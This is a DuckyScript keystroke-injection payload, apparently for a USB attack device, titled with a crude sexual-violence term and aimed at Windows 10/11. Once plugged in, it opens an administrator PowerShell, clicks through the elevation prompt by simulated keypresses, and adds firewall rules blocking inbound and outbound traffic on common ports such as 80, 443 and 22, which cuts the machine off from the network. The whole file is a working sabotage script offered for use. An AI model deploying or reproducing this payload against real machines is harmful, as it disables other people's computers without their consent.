REM Title: PORT RAPE
REM Author: Sorted#0002
REM OS: Windows 10/11
REM Description: This Blocks most common ports like 80, 443, 22, 21, 8080


DELAY 750
WINDOWS d
DELAY 850
WINDOWS r
DELAY 900
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 750
LEFTARROW
ENTER
DELAY 900
ALT y
DELAY 900
STRING netsh advfirewall firewall add rule name="PORTRAPE" protocol=TCP dir=out remoteport=80,443,22,21,8080,8081,4040,4098,23,194,8443 action=block
ENTER
DELAY 900
STRING netsh advfirewall firewall add rule name="PORTRAPE" protocol=UDP dir=out remoteport=80,443,22,21,8080,8081,4040,4098,23,194,8443 action=block
ENTER
DELAY 900
STRING netsh advfirewall firewall add rule name="PORTRAPE" protocol=TCP dir=in remoteport=80,443,22,21,8080,8081,4040,4098,23,194,8443 action=block
ENTER
DELAY 900 
STRING netsh advfirewall firewall add rule name="PORTRAPE" protocol=UDP dir=in remoteport=80,443,22,21,8080,8081,4040,4098,23,194,8443 action=block
ENTER
DELAY 900
STRING exit
ENTER
